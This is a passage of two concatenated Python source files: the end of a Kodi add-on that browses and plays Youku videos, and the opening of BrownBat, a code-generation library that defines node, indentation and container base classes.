= sys.argv[0]+""?mode=10&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb)\n #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline})\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)\n\n for num in plist:\n li = xbmcgui.ListItem(""... 第"" + num + ""页"")\n u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+str(num)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) \n xbmcplugin.setContent(int(sys.argv[1]), \'movies\')\n xbmcplugin.endOfDirectory(int(sys.argv[1]))\n\ndef selResolution(streamtypes):\n ratelist = []\n for i in range(0,len(streamtypes)):\n if streamtypes[i] in (\'flv\', \'flvhd\'): ratelist.append([4, \'标清\', i, \'flv\']) # [清晰度设置值, 清晰度, streamtypes索引]\n if streamtypes[i] in (\'mp4\', \'mp4hd\'): ratelist.append([3, \'高清\', i, \'mp4\'])\n if streamtypes[i] in (\'hd2\', \'hd2v2\', \'mp4hd2\', \'mp4hd2v2\'): ratelist.append([2, \'超清\', i, \'hd2\'])\n if streamtypes[i] in (\'hd3\', \'hd3v2\', \'mp4hd3\', \'mp4hd3v2\'): ratelist.append([1, \'1080P\', i, \'hd3\'])\n ratelist.sort()\n if len(ratelist) > 1:\n resolution = int(__addon__.getSetting(\'resolution\'))\n if resolution == 0: # 每次询问视频清晰度\n list = [x[1] for x in ratelist]\n sel = xbmcgui.Dialog().select(\'清晰度(低网速请选择低清晰度)\', list)\n if sel == -1:\n return None, None, None, None\n else:\n sel = 0\n while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1\n else:\n sel = 0\n return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3]\n\ndef youku_ups(id):\n res = urllib2.urlopen(\'https://log.mmstat.com/eg.js\')\n cna = res.headers[\'etag\'][1:-1]\n query = urllib.urlencode(dict(\n vid = id,\n ccode = \'0516\',\n client_ip = \'127.0.0.1\',\n utid = cna,\n client_ts = time.time() / 1000,\n ckey = \'PI:KEY\'\n ))\n url = \'https://ups.youku.com/ups/get.json?%s\' % (query)\n link = GetHttpData(url, referer=\'http://v.youku.com/\')\n json_response = simplejson.loads(link)\n api_data = json_response[\'data\']\n data_error = api_data.get(\'error\')\n if data_error:\n api_error_code = data_error.get(\'code\')\n api_error_msg = data_error.get(\'note\').encode(\'utf-8\')\n dialog = xbmcgui.Dialog()\n ok = dialog.ok(__addonname__,\'地址解析错误(%d):\\n%s\' % (api_error_code,api_error_msg))\n return {}\n else:\n return api_data\n\ndef change_cdn(url):\n # if the cnd_url starts with an ip addr, it should be youku\'s old CDN\n # which rejects http requests randomly with status code > 400\n # change it to the dispatcher of aliCDN can do better\n # at least a little more recoverable from HTTP 403\n dispatcher_url = \'vali.cp31.ott.cibntv.net\'\n if dispatcher_url in url:\n return url\n elif \'k.youku.com\' in url:\n return url\n else:\n url_seg_list = list(urlparse.urlsplit(url))\n url_seg_list[1] = dispatcher_url\n return urlparse.urlunsplit(url_seg_list)\n\ndef PlayVideo(name,id,thumb):\n movdat = youku_ups(id)\n if not movdat:\n return\n\n vid = id\n lang_select = int(__addon__.getSetting(\'lang_select\')) # 默认|每次选择|自动首选\n if lang_select != 0 and movdat.has_key(\'dvd\') and \'audiolang\' in movdat[\'dvd\']:\n langlist = movdat[\'dvd\'][\'audiolang\']\n if lang_select == 1:\n list = [x[\'lang\'] for x in langlist]\n sel = xbmcgui.Dialog().select(\'选择语言\', list)\n if sel ==-1:\n return\n vid = langlist[sel][\'vid\'].encode(\'utf-8\')\n name = \'%s %s\' % (name, langlist[sel][\'lang\'].encode(\'utf-8\'))\n else:\n lang_prefer = __addon__.getSetting(\'lang_prefer\') # 国语|粤语\n for i in range(0,len(langlist)):\n if langlist[i][\'lang\'].encode(\'utf-8\') == lang_prefer:\n vid = langlist[i][\'vid\'].encode(\'utf-8\')\n name = \'%s %s\' % (name, langlist[i][\'lang\'].encode(\'utf-8\'))\n break\n if vid != id:\n movdat = youku_ups(vid)\n if not movdat:\n return\n\n streamtypes = [stream[\'stream_type\'].encode(\'utf-8\') for stream in movdat[\'stream\']]\n typeid, typename, streamno, resolution = selResolution(streamtypes)\n if typeid:\n \'\'\'\n oip = movdat[\'security\'][\'ip\']\n ep = movdat[\'security\'][\'encrypt_string\']\n sid, token = youkuDecoder().get_sid(ep)\n play_method = int(__addon__.getSetting(\'play_method\'))\n if play_method != 0: # m3u8方式\n query = urllib.urlencode(dict(\n vid=vid, ts=int(time.time()), keyframe=1, type=resolution,\n ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid,\n ))\n cookie = [\'%s=%s\' % (x.name, x.value) for x in cj][0]\n movurl = \'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s\' % (query, cookie)\n\n else: # 默认播放方式\n if typeid in (\'mp4\', \'mp4hd\'):\n type = \'mp4\'\n else:\n type = \'flv\'\n urls = []\n segs = movdat[\'stream\'][streamno][\'segs\']\n total = len(segs)\n for no in range(0, total):\n k = segs[no][\'key\']\n if k == -1:\n dialog = xbmcgui.Dialog()\n ok = dialog.ok(__addonname__,\'会员节目,无法播放\')\n return\n fileid = segs[no][\'fileid\']\n ep = youkuDecoder().generate_ep(no, fileid, sid, token)\n query = urllib.urlencode(dict(\n ctype = 12,\n ev = 1,\n K = k,\n ep = urllib.unquote(ep),\n oip = oip,\n token = token,\n yxon = 1\n ))\n url = \'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}\'.format(\n sid = sid,\n container = type,\n fileid = fileid,\n query = query\n )\n link = GetHttpData(url)\n json_response = simplejson.loads(link)\n urls.append(json_response[0][\'server\'].encode(\'utf-8\'))\n movurl = \'stack://\' + \' , \'.join(urls)\n \'\'\'\n movurl = movdat[\'stream\'][streamno][\'m3u8_url\']\n #urls = []\n #is_preview = False\n #for seg in movdat[\'stream\'][streamno][\'segs\']:\n # if seg.get(\'cdn_url\'):\n # urls.append(change_cdn(seg[\'cdn_url\'].encode(\'utf-8\')))\n # else:\n # is_preview = True\n #if not is_preview:\n # movurl = \'stack://\' + \' , \'.join(urls)\n name = \'%s[%s]\' % (name, typename)\n listitem=xbmcgui.ListItem(name,thumbnailImage=thumb)\n listitem.setInfo(type=""Video"",infoLabels={""Title"":name})\n xbmc.Player().play(movurl, listitem)\n\ndef performChanges(name,id,listpage,genre,area,year,order,days):\n genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)\n change = False\n if id == \'c_95\':\n str1 = \'风格\'\n str3 = \'发行\'\n elif id == \'c_84\' or id == \'c_87\':\n str1 = \'类型\'\n str3 = \'出品\'\n else:\n str1 = \'类型\'\n str3 = \'时间\'\n dialog = xbmcgui.Dialog()\n if len(genrelist)>0:\n list = [x[1] for x in genrelist]\n sel = dialog.select(str1, list)\n if sel != -1:\n genre = genrelist[sel][0]\n change = True\n if len(arealist)>0:\n list = [x[1] for x in arealist]\n sel = dialog.select(\'地区\', list)\n if sel != -1:\n area = arealist[sel][0]\n change = True\n if len(yearlist)>0:\n list = [x[1] for x in yearlist]\n sel = dialog.select(str3, list)\n if sel != -1:\n year = yearlist[sel][0]\n change = True\n list = [x[1] for x in DAYS_LIST1]\n sel = dialog.select(\'范围\', list)\n if sel != -1:\n days = DAYS_LIST1[sel][0]\n change = True\n list = [x[1] for x in ORDER_LIST1]\n sel = dialog.select(\'排序\', list)\n if sel != -1:\n order = ORDER_LIST1[sel][0]\n change = True\n\n if change:\n progList(name,id,\'1\',genre,area,year,order,days)\n\ndef performChanges2(name,id,listpage,genre,order,days):\n genrelist = getList2(listpage, genre)\n change = False\n dialog = xbmcgui.Dialog()\n if len(genrelist)>0:\n list = [x[1] for x in genrelist]\n sel = dialog.select(\'类型\', list)\n if sel != -1:\n genre = genrelist[sel][0]\n change = True\n list = [x[1] for x in DAYS_LIST2]\n sel = dialog.select(\'范围\', list)\n if sel != -1:\n days = DAYS_LIST2[sel][0]\n change = True\n list = [x[1] for x in ORDER_LIST2]\n sel = dialog.select(\'排序\', list)\n if sel != -1:\n order = ORDER_LIST2[sel][0]\n change = True\n\n if change:\n progList2(name,id,\'1\',genre,order,days)\n\ndef get_params():\n param = []\n paramstring = sys.argv[2]\n if len(paramstring) >= 2:\n params = sys.argv[2]\n cleanedparams = params.replace(\'?\', \'\')\n if (params[len(params) - 1] == \'/\'):\n params = params[0:len(params) - 2]\n pairsofparams = cleanedparams.split(\'&\')\n param = {}\n for i in range(len(pairsofparams)):\n splitparams = {}\n splitparams = pairsofparams[i].split(\'=\')\n if (len(splitparams)) == 2:\n param[splitparams[0]] = splitparams[1]\n return param\n\nparams = get_params()\nmode = None\nname = \'\'\nid = \'\'\ngenre = \'\'\narea = \'\'\nyear = \'\'\norder = \'\'\npage = \'1\'\nurl = None\nthumb = None\n\ntry:\n thumb = urllib.unquote_plus(params[""thumb""])\nexcept:\n pass\ntry:\n url = urllib.unquote_plus(params[""url""])\nexcept:\n pass\ntry:\n page = urllib.unquote_plus(params[""page""])\nexcept:\n pass\ntry:\n order = urllib.unquote_plus(params[""order""])\nexcept:\n pass\ntry:\n days = urllib.unquote_plus(params[""days""])\nexcept:\n pass\ntry:\n year = urllib.unquote_plus(params[""year""])\nexcept:\n pass\ntry:\n area = urllib.unquote_plus(params[""area""])\nexcept:\n pass\ntry:\n genre = urllib.unquote_plus(params[""genre""])\nexcept:\n pass\ntry:\n id = urllib.unquote_plus(params[""id""])\nexcept:\n pass\ntry:\n name = urllib.unquote_plus(params[""name""])\nexcept:\n pass\ntry:\n mode = int(params[""mode""])\nexcept:\n pass\n\ncj = cookielib.CookieJar()\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\nurllib2.install_opener(opener)\n\nif mode == None:\n rootList()\nelif mode == 1:\n progList(name,id,page,genre,area,year,order,days)\nelif mode == 2:\n getMovie(name,id,thumb)\nelif mode == 3:\n seriesList(name,id,thumb)\nelif mode == 4:\n performChanges(name,id,page,genre,area,year,order,days)\nelif mode == 10:\n PlayVideo(name,id,thumb)\nelif mode == 11:\n progList2(name,id,page,genre,order,days)\nelif mode == 12:\n performChanges2(name,id,page,genre,order,days)\n\n', '\n# Copyright 2014 Douglas RAILLARD\n#\n# This file is part of BrownBat.\n#\n# BrownBat is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# BrownBat is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with BrownBat. If not, see .\n\n""""""\n.. moduleauthor:: Douglas RAILLARD dummy@email.com\n\nThis module mostly provides base classes intended to be subclassed for building\nlangage specific source code generation libraries.\n\nThey implement functionnalities related to operators overloading that can be used in any langage.\nEvery class representing source code constructs are known as node.\nThe following helpers functions are provided:\n\n* :func:`listify`: create a list from an iterable or a single element.\n* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.).\n* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string.\n\nThe following classes are provided:\n\n* :class:`Indentation`: manage the indentation level in the code generator.\n* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as a non iterable by :func:`listify`.\n* :class:`NodeMeta`: metaclass of all class representing some source code constructs.\n* :class:`NodeABC`: abstract base class of all class representing some source code constructs.\n* :class:`NodeBase`: base class of almost all class representing some source code constructs.\n* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition.\n* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC.\n* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name.\n* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable).\n* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required.\n* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading.\n* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenate them when printed.\n* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance).\n* :class:`TokenListBase`: base class for a token list.\n* :class:`IndentedTokenListBase`: base class for a token list which indents it content when printed.\n* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`.\n* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator.\n\n""""""\n\n\nimport collections\nimport numbers\nimport abc\nimport inspect\nimport copy\nimport functools\nimport os\n\n\ndef listify(iterable_or_single_elem):\n """"""Create a list out of:\n\n * an iterable object: the result will be like ``list(iterable_or_single_elem)``\n * a object which cannot be iterated over: return a list with only one item (just the object)\n * an object which is iterable, but also a subclass of :class:`NonIterable`:\n return a list with just the object, as if it was not iterable.\n """"""\n if iterable_or_single_elem is None:\n return []\n # We exclude iterables such as strings or NonIterable (StmtContainer for example)\n # because we want to keep them as one object and not split them\n if isinstance(iterable_or_single_elem, collections.Iterable) \\\n and not isinstance(iterable_or_single_elem, (str, NonIterable)):\n return list(iterable_or_single_elem)\n else:\n return [iterable_or_single_elem]\n\ndef format_string(string, style, separator=""_""):\n """""" Format a string according to a convention.\n\n It is can be used to write identfiers name in a unified format before applying a naming convention.\n\n :param string: the string to be modified. It must be in a format where the word sperator is always the same.\n :param style: the convention. It can be one of:\n\n * UpperCamelCase\n * lowerCamelCase\n * lower_underscore_case\n * UPPER_UNDERSCORE_CASE\n :param separator: the word separator used to split the words appart before applying the convention.\n It defaults to \'_\'.\n """"""\n if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)):\n token_list = string\n else:\n token_list = str(string).split(separator)\n # If there is only one token in the list and in case it is an empty\n # string, we dont want to replace it with a _\n if len(token_list) != 1:\n for i, token in enumerate(token_list):\n if not token:\n token_list[i] = separator\n\n if style == ""UpperCamelCase"":\n return """".join(token.capitalize() for token in token_list)\n\n if style == ""lowerCamelCase"":\n first_word = token_list[0].lower()\n remain_list = token_list[1:]\n return first_word+"""".join(token.capitalize() for token in remain_list)\n\n if style == ""lower_underscore_case"":\n return ""_"".join(token.lower() for token in token_list)\n\n if style == ""UPPER_UNDERSCORE_CASE"":\n return ""_"".join(token.upper() for token in token_list)\n\ndef strip_starting_blank_lines(snippet):\n """"""Strip blank lines at the beginning of a multiline string.""""""\n\n last_new_line_pos = 0\n for position, char in enumerate(snippet):\n if char==\'\\n\':\n last_new_line_pos = position\n elif char!=\'\\t\' and char!=\' \' and char!=\'\\v\':\n break\n # Only keep one new line at the beginning, to avoid multiple blank lines\n return snippet[last_new_line_pos:]\n\nclass Indentation:\n """"""This class manages the indentation in the source code output.\n\n Instances can be printed to give the string to put at the beginning of a new indented line.\n\n >>> idt = Indentation()\n >>> idt.indent()\n >>> print(\'*\'+str(idt)+\'indented Hello World\')\n * indented Hello World\n """"""\n\n # Default indentation style (4 spaces)\n indentation_string = \' \'\n\n @classmethod\n def ensure_idt(cls, idt):\n """"""Create a new indentation instance if *idt* is None,\n or return *idt* if it is already an :class:`Indentation` instance.\n """"""\n if idt is None:\n idt = cls()\n elif isinstance(idt, numbers.Integral):\n idt = cls(idt)\n elif isinstance(idt, str):\n idt = cls(indentator=idt)\n return idt\n\n\n def __init__(self, level=0, indentator=None):\n """"""\n :param level: the initial indentation level\n :type level: int\n :param indentator: the string used to display indentation.\n It defaults to the class attribute *indentation_string* which is four spaces.\n """"""\n self.indentation_level = level\n # If an indentation is string is given, override the classwide default with\n # an instance-local string\n if indentator is not None:\n self.indentation_string = indentator\n\n def indent(self, level=1):\n """"""Increase the indentation level by *level* levels.""""""\n self.indentation_level += level\n\n def dedent(self, level=1):\n """"""Decrease the indentation level by *level* levels.""""""\n self.indentation_level -= level\n\n def __str__(self):\n """"""Return the string to be used at the beginning of a line to display the indentation.""""""\n return self.indentation_string * self.indentation_level\n\n\nclass NonIterable:\n """""" Inheriting from this class will prevent a class to be considered as\n :class:`collections.Iterable` by :func:`listify`.\n """"""\n pass\n\nclass NodeMeta(abc.ABCMeta):\n """"""Meta class used for every node, i.e. every class representing source code constructs.\n\n Currently, it only does a bit of black magic on :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods:\n it creates a wrapper around them that calls *inline_str_filter* if it exists on their return string, to\n let the user apply some naming convention at the latest stage.\n """"""\n def __new__(meta, name, bases, dct):\n # Add automatic \'inheritance\' for __format_string class attribute\n attr_name = \'_\'+name+\'__format_string\'\n if bases and not attr_name in dct:\n try:\n dct[attr_name] = bases[0].__dict__[\'_\'+bases[0].__name__+\'__format_string\']\n except KeyError:\n pass\n\n # Wrap inline_str function to allow automatic filtering on its output\n def make_wrapper(wrapped_fun):\n @functools.wraps(wrapped_fun)\n def wrapper_fun(self, *args, **kwargs):\n result = wrapped_fun(self, *args, **kwargs)\n try:\n filter_fun = self.inline_str_filter\n except AttributeError:\n # Just return the string as is, no filter hook is installed\n return result\n else:\n # Call the filter on the resulting string\n return filter_fun(result)\n\n return wrapper_fun\n\n for stringify_fun_name in [\'inline_str\', \'self_inline_str\']:\n if stringify_fun_name in dct:\n wrapped_fun = dct[stringify_fun_name]\n dct[stringify_fun_name] = make_wrapper(wrapped_fun)\n\n return super().__new__(meta, name, bases, dct)\n\nclass NodeABC(metaclass=NodeMeta):\n """"""This class is an Abstract Base Class describing the most basic API evey node should conform to.""""""\n __format_string = \'\'\n\n @abc.abstractmethod\n def inline_str(self, idt=None):\n """"""This function is called to print the content of the node in an inline context.\n\n This can be for example when the node is printed inside an expression.\n This function should not try to print a preceding new line or indentation string.\n """"""\n\n pass\n @abc.abstractmethod\n def freestanding_str(self, idt=None):\n """"""This function is called to print the content of the node in a freestanding context.\n\n This can be for example when the node is printed in directly in the source file.\n This function should print the preceding new line and indentation if the source code constructs\n requires it.\n """"""\n pass\n\n @abc.abstractmethod\n def adopt_node(self, child):\n pass\n\nclass NodeAttrProxy(NodeABC):\n """"""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given\n attribute of a given instance.\n\n It creates stubs that allows transparent composition for the most limited subset of the APIs\n provided by this library to avoid getting into crazy things.\n This class should really be used when this enable to factor lots of code. A design based on\n hooks implemented in subclasses called by a base class is preferable in most case where you\n would be tempted to use this proxy.\n """"""\n def __init__(self, obj, attr_name):\n self.obj = obj\n self.attr_name = attr_name\n\n def inline_str(self, idt=None):\n return getattr(self.obj, self.attr_name).inline_str(idt)\n\n def freestanding_str(self, idt=None):\n return getattr(self.obj, self.attr_name).freestanding_str(idt)\n\n def adopt_node(self, child):\n return getattr(self.obj, self.attr_name).adopt_node(child)\n\nclass EnsureNode:\n """"""This class is a descriptor that makes sure that the attribute that uses it holds a reference\n to an instance of one of the classes given in *node_classinfo*.\n\n When set, this descriptor check if the given object is indeed an instance of *node_classinfo* classes.\n If not, it calls *node_factory* to build an object and store its return value. Therefore,\n the content of the attribute using this descriptor is always some instance of the classes\n contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions\n on the type of data hold by the attribute.\n\n .. note:: The *node_classinfo* always contains the class :class:`NodeABC`.\n """"""\n def __init__(self, storage_attr_name, node_factory, node_classinfo=()):\n """"""\n :param storage_attr_name: the underlying attribute used to store the object.\n :param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute.\n :param node_classinfo: this is a tuple that containes classes.\n The value stored in the attribute is checked against this tuple using :func:`isinstance` to\n determine if the factory should be used. This always contains at least :class:`NodeABC`\n """"""\n self.storage_attr_name = storage_attr_name\n self.node_factory = node_factory\n\n node_classinfo = listify(node_classinfo)+[NodeABC]\n if inspect.isclass(self.node_factory):\n node_classinfo.append(self.node_factory)\n node_classinfo = tuple(node_classinfo)\n\n self.node_classinfo = node_classinfo\n\n def __get__(self, instance, owner):\n if instance is not None:\n return instance.__dict__[self.storage_attr_name]\n # If the descriptor is called as a class attribute, it\n # just returns itself, to allow the world to see that it\n # is a descriptor\n else:\n return self\n\n def __set__(self, instance, value):\n if not isinstance(value, self.node_classinfo):\n value = self.node_factory(value)\n instance.__dict__[self.storage_attr_name] = value\n\nclass NodeBase(NodeABC):\n """"""This class is the base classes of most nodes.\n\n It provides some default implementations for methods of :class:`NodeABC`.\n """"""\n @classmethod\n def ensure_node(cls, obj, factory=None):\n """"""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`\n , and if not, tries to build a node from it using the class this class method is called from or *factory*.\n\n .. note:: You should better use the :class:`EnsureNode` descriptor when possible, instead of making a use of\n this class method.\n\n .. warning:: Not every class supports to be called whith only one parameter, so a call to this\n class method is note is not guaranteed to succeed.\n\n\n :param obj: the object to build a node from.\n :param factory: an optional factory used to build the node from *obj*. If not provided, the class this\n method is called from is called whith *obj* as first and only parameter.\n """"""\n\n if isinstance(obj, (cls, NodeABC)):\n return obj\n else:\n if factory is not None:\n return factory(obj)\n else:\n return cls(obj)\n\n def __init__(self, comment=None, side_comment=None, parent=None):\n """""" All of the paramaters should be used as keyword arguments, because they are forwarded from\n the children classes and the order at the arrival is not guaranteed.\n\n :param comment: a comment node that will be printed next to the current node when the source code of\n the node is generated. Usually, it is a block comment printed before the node\n in languages that supports them. This comment is printed by the containers such as\n :class:`NodeContainerBase`, so it does not require any support from the class.\n\n :param side_comment: a comment that will be printed just by the current node when the source code of\n the node is generated. Usually, it is a one line comment, printed right to the\n node. Be aware that this parameter is used by the class in whatever way it wants to,\n and there is no guarantee it will be printed at all.\n """"""\n\n # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes\n self.comment = comment\n # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes\n self.side_comment = side_comment\n\n # We dont use try: ... except: to avoid catching exceptions\n # occuring inside adopt_node call\n if parent is not None:\n if hasattr(parent, \'adopt_node\'):\n parent.adopt_node(self)\n else:\n raise NotImplementedError(""The given parent does not support child adoption"")\n\n\n def freestanding_str(self, idt=None):\n """"""See :class:`NodeABC` for the role of this function.\n\n This implementation just calls *inline_str* and prepends a new line and indentation string.\n """"""\n idt = Indentation.ensure_idt(idt)\n snippet = self.inline_str(idt)\n # Do not output anything if the string is empty\n if snippet:\n return \'\\n\'+str(idt)+snippet\n else:\n return \'\'\n\n def __str__(self, idt=None):\n """"""This implementation tries to print the node by probing the object for some methods:\n\n 1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node\n 2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node\n 3. *freestanding_str()*: see :class:`NodeABC`\n """"""\n # We dont use try: ... except: to avoid catching exceptions\n # occuring inside freestanding_str call\n\n # Try to display a declaration\n if hasattr(self, \'decl\'):\n self_decl = self.decl()\n if isinstance(self_decl, NodeABC):\n return self_decl.freestanding_str(idt)\n # Or a definition\n elif hasattr(self, \'defi\'):\n self_defi = self.defi()\n if isinstance(self_defi, NodeABC):\n return self_defi.freestanding_str(idt)\n\n else:\n return self.freestanding_str(idt)\n\n def adopt_node(self, child):\n self.append(child)\n\n\nclass DelegatedAttribute:\n """"""This class is a descriptor that allows an object to use the value of that attribute of another instance.\n\n For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment\n attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the\n :class:`NodeViewBase` instance. When that attribute is set, it uses its own object instead of refering to its parent\n one.\n """"""\n def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):\n """"""\n :param attr_name: the name of the attribute to manage.\n :param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also\n holding an *attr_name* attribute.\n :param descriptor: a descriptor class, in case the attribute should be managed through a descriptor.\n This allows basic descriptor chaining.\n :param default_value_list: a list of default values that does not trigger the switch to the local attribute.\n For example, if a class set by default a *comment* attribute to None, the attribute\n look up should still be made in the other instance. That way, it allows some placeholder\n value to be set, without altering the intended behavior.\n """"""\n self.attr_name = attr_name\n self.delegated_to_attr_name = delegated_to_attr_name\n self.descriptor = descriptor\n self.default_value_list = default_value_list\n\n def __get__(self, instance, owner):\n if instance is not None:\n # If the attribute has been set on the instance, just get it\n if instance.__dict__.get(\'__\'+self.attr_name+\'_is_set\', False):\n if self.descriptor is not None:\n return self.descriptor.__get__(instance, owner)\n else:\n return instance.__dict__[self.attr_name]\n\n # Else it means that the attribute has not been set,\n # so we delegate to the parent\n else:\n parent = getattr(instance, self.delegated_to_attr_name)\n return getattr(parent, self.attr_name)\n\n # If the descriptor is called as a class attribute, it\n # just returns itself, to allow the world to see that it\n # is a descriptor\n else:\n return self\n\n def __set__(self, instance, value):\n if self.descriptor is not None:\n self.descriptor.__set__(instance, value)\n else:\n instance.__dict__[self.attr_name] = value\n\n # If the value is one of the default_value_list, do not consider that the attribute was\n # set. This allows some code in base classes to set the attribute to None\n # by default, and still get the parent\'s attribute when it is the case\n if value not in self.default_value_list:\n instance.__dict__[\'__\'+self.attr_name+\'_is_set\'] = True\n\n\nclass NodeViewBase(NodeBase):\n """"""This is the base class of the node that are view of other node.\n\n For example, a variable declaration is a view of the variable, as it only displays\n informations already contained in the variable object.\n View nodes should store the reference of their parent in a *parent* attribute.\n """"""\n def __init__(self, parent, *args, **kwargs):\n self.parent = parent\n super().__init__(*args, **kwargs)\n\n def __eq__(self, other):\n """"""implementation of the equality test between two views:\n it tests to see if they have the same parent and if the two view\n are of the exact same type.\n """"""\n return type(self) is type(other) and self.parent is other.parent\n\n\n\nclass PhantomNode(NodeBase):\n """"""This class is a node that will be printed as an empty string.\n\n This is intended to be used as a placeholder when a :class:`NodeABC` instance is required.\n """"""\n # PhantomNode must not call Node.__init__ because it causes infinite\n # recursion when built from Node.__init__\n def __init__(self, *args, **kwargs):\n self.parent = self\n self.comment = self\n self.side_comment = self\n\n def inline_str(self, idt=None):\n return \'\'\n\n freestanding_str = inline_str\n\n# Instance used everywhere, instead of creating billions of identical PhantomNode\nPHANTOM_NODE = PhantomNode()\n\n\nclass NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):\n """"""This is the base class of all the nodes that contains a list of other nodes.\n\n It implements all the logic for operators overloading, and printing the nodes that it takes care of.\n It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves\n like a list. The only exception is when given to :func:`listify`, it remains as a single object, because\n it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later,\n and the result should be taken into account by the consumer that used :func:`listify` on it. If it was not the case,\n the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` is called.\n\n The other important aspect of this class is that it can guarantee the type of the contained nodes, even when\n overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments.\n """"""\n\n default_node_classinfo = (NodeABC,)\n\n def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):\n """"""\n :param node_list: the list of nodes that the container contains\n :param node_classinfo: a tuple of classes used to check the nodes that enters the container.\n If a node is not an instance of one of the *node_classinfo* classes, it is\n passed to *node_factory*. All of the classes in *node_classinfo* must be\n subclasses of :class:`NodeABC`.\n :param node_factory: a factory used when an object which is not an instance of one of the classes of\n *node_classinfo* tries to enter the container. The return value of this factory\n is then allowed inside.\n """"""\n node_classinfo_tuple = tuple(listify(node_classinfo))\n for classinfo in node_classinfo_tuple:\n if not issubclass(classinfo, NodeABC):\n raise ValueError(\'node_classinfo must be a subclass of NodeABC\')\n\n node_list = listify(node_list)\n\n if node_classinfo is None:\n self.node_classinfo = self.default_node_classinfo\n else:\n self.node_classinfo = node_classinfo_tuple\n\n if node_factory is None:\n # If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo\n # which is only composed of NodeABC, and therefore cannot be used as a factory\n if node_classinfo is None:\n raise ValueError(\n \'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo\'\n )\n\n # The first element in the tuple is taken as the factory\n node_factory = self.node_classinfo[0]\n\n # A wrapper to make sure that the output of the node_factory is\n # indeed a NodeABC\n def make_node_factory_wrapper(factory):\n def wrapper(node):\n result = factory(node)\n if not isinstance(result, NodeABC):\n raise ValueError(""The node factory did not give a NodeABC"")\n else:\n return result\n return wrapper\n\n self.node_factory = make_node_factory_wrapper(node_factory)\n\n self.node_list = [\n item if isinstance(item, self.node_classinfo) else self.node_factory(item)\n for item in node_list\n ]\n super().__init__(*args, **kwargs)\n\n def inline_str(self, idt=None):\n """"""Print all the contained nodes using their *freestanding_str* method,\n because a container is a freestanding context.\n It also strips the blank lines at the beginning.\n """"""\n snippet = """"\n for node in self.node_list:\n if hasattr(node, \'comment\'):\n snippet += node.comment.freestanding_str(idt)\n snippet += node.freestanding_str(idt)\n\n return strip_starting_blank_lines(snippet)\n\n def freestanding_str(self, idt=None):\n """"""Calls super().freestanding_str, and strip the blank lines\n at the beginning.\n """"""\n snippet = super().freestanding_str(idt)\n return strip_starting_blank_lines(snippet)\n\n def __copy__(self):\n cls = type(self)\n new_obj = cls.__new__(cls)\n new_obj.__dict__.update(self.__dict__)\n new_obj.node_list = copy.copy(self.node_list)\n new_obj.node_classinfo = copy.copy(self.node_classinfo)\n new_obj.node_factory = copy.copy(self.node_factory)\n return new_obj\n\n def clear(self):\n # We preserve the object\'s itself, we 